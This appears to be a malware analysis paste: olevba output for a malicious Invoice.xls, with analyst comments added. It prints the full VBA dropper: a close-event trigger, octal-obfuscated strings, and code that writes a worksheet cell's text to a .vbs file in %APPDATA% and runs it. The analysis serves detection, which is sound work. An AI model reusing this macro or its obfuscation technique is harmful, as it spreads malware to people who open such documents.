dynamoo

Malicious Excel macro

Apr 8th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:M-S---- Invoice.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Invoice.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ЭтаКнига.cls
  13. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_BeforeClose(Cancel As Boolean)
      ' Analyst note: Workbook_BeforeClose is an Excel workbook event handler, so this
      ' body runs when the workbook is being closed, not when it is opened.
      ' Its only statement calls hjgHGjkdg, the Sub defined in Module1 of this report.
      ' The olevba 0.25 flags for this file (M-S----) carry no A (auto-executable) marker
      ' and the per-module analysis lists no keyword here, so this trigger has to be
      ' found by reading the code. Analysis that opens the document but never closes it
      ' would not reach the call below.
  16. hjgHGjkdg
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. No suspicious keyword or IOC found.
  21. -------------------------------------------------------------------------------
  22. VBA MACRO Лист1.cls
  23. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. Option Explicit
  26.  
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. ANALYSIS:
  29. No suspicious keyword or IOC found.
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Лист2.cls
  32. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. Option Explicit
  35.  
  36. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  37. ANALYSIS:
  38. No suspicious keyword or IOC found.
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Лист3.cls
  41. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Module1.bas
  46. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. Sub hjgHGjkdg()
      ' Analyst note: write-then-run routine. It takes text stored in a worksheet cell,
      ' saves it to a file and launches that file. Every string that would identify the
      ' target path, the COM objects and the cell is passed through DecryptEPI (Module2),
      ' so none of them appear in clear text for keyword scanners.
      ' NOTE(review): some bytes of the encoded literals appear to have been lost or
      ' re-encoded in this paste; decode from the original file before recording IOCs.
  49. Dim PathToSave
      ' Using the bytes visible here, the literal decodes to a path that starts with
      ' %APPDATA% and ends in .vbs; the file name in between may be incomplete.
  50. PathToSave = DecryptEPI("-exxhe|e-†“–kjj—£’8¦Ž£")
  51. Dim WshShell
      ' ProgID is obfuscated; the later ExpandEnvironmentStrings and Run calls are
      ' consistent with WScript.Shell - confirm against the original sample.
  52. Set WshShell = CreateObject(DecryptEPI("{¢— ¤8{–‘šš"))
      ' Resolves the environment variable in the path to the current user's profile.
  53. PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
      ' Second obfuscated ProgID; Mode/Type/Open/WriteText/SaveToFile are consistent with
      ' ADODB.Stream. If so, Mode 3 is read/write and Type 2 is text - TODO confirm.
      ' "s" is used without a Dim statement.
  54. Set s = CreateObject(DecryptEPI("ehuhf8{¤¢‘›"))
  55. s.Mode = 3
  56. s.Type = 2
  57. s.Open
      ' The payload text comes from the workbook itself: one cell whose sheet name and
      ' range address are both obfuscated. Nothing is downloaded in this routine.
  58. s.WriteText Worksheets(DecryptEPI("’™")).Range(DecryptEPI("h><")).Value
      ' Second argument 2 presumably requests create-or-overwrite - verify for the object type.
  59. Call s.SaveToFile(PathToSave, 2)
      ' Launches the file just written. Detection angle: Excel writing a script file
      ' under the user's roaming profile and then starting it.
  60. WshShell.Run PathToSave
  61. End Sub
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+--------------+-----------------------------------------+
  71. | Type       | Keyword      | Description                             |
  72. +------------+--------------+-----------------------------------------+
  73. | Suspicious | CreateObject | May create an OLE object                |
  74. | Suspicious | WriteText    | May create a text file                  |
  75. | Suspicious | SaveToFile   | May create a text file                  |
  76. | Suspicious | Open         | May open a file                         |
  77. | Suspicious | Run          | May run an executable file or a system  |
  78. |            |              | command                                 |
  79. +------------+--------------+-----------------------------------------+
  80. -------------------------------------------------------------------------------
  81. VBA MACRO Module2.bas
  82. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84. Public Function DecryptEPI(sString As String) As String
  85.     Dim I As Integer
  86.     Dim sLen As Integer, sBuffer As String
  87.     sLen = Len(sString)
  88.     For I = 1 To sLen
  89.         sBuffer = sBuffer & Chr(Oct2Dec(Asc(Mid(sString, I, 1))))
  90.     Next I
  91.     DecryptEPI = sBuffer
  92. End Function
  93.  
  94. Private Function Oct2Dec(Number As String) As Integer
  95.     Dim I As Integer
  96.     Dim sLen As String, sBuffer As Integer, iNumb As Integer
  97.     sLen = Len(Number)
  98.     For I = 0 To sLen
  99.         iNumb = Val(Mid(StrReverse(Number), I + 1, 1))
  100.         sBuffer = sBuffer + ((8 ^ I) * iNumb)
  101.     Next I
  102.     Oct2Dec = sBuffer
  103. End Function
  104.  
  105. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  106. ANALYSIS:
  107. +------------+------------+-----------------------------------------+
  108. | Type       | Keyword    | Description                             |
  109. +------------+------------+-----------------------------------------+
  110. | Suspicious | Chr        | May attempt to obfuscate specific       |
  111. |            |            | strings                                 |
  112. | Suspicious | StrReverse | May attempt to obfuscate specific       |
  113. |            |            | strings                                 |
  114. +------------+------------+-----------------------------------------+